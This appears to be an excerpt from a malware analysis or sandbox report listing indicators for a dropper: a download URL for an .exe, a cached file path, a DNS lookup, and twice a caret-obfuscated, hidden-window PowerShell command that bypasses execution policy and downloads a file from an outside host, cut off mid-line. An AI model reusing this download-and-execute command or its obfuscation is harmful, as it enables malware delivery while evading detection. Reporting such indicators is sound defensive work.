Technical Information
- http://guardian-angels.be/images/8f7ws/fzd2.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OW^ersh^ELl^.^Ex^E -eX^ECUtIOn^Po^licY^ ByPASs^ ^-^N^OP^rO^FiL^E ^-w^I^n^Do^Ws^T^Y^Le^ ^H^iDdE^n ^(N^eW-oB^J^E^cT s^YstEm^.^nEt.wEBcliE^NT^).^Do^w^nlOaD^f^i^LE^('http://guardian-a...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK gu####an-angels.be
- '<SYSTEM32>\cmd.exe' /C "p^OW^ersh^ELl^.^Ex^E -eX^ECUtIOn^Po^licY^ ByPASs^ ^-^N^OP^rO^FiL^E ^-w^I^n^Do^Ws^T^Y^Le^ ^H^iDdE^n ^(N^eW-oB^J^E^cT s^YstEm^.^nEt.wEBcliE^NT^).^Do^w^nlOaD^f^i^LE^('http://guardian-a...' (with hidden window)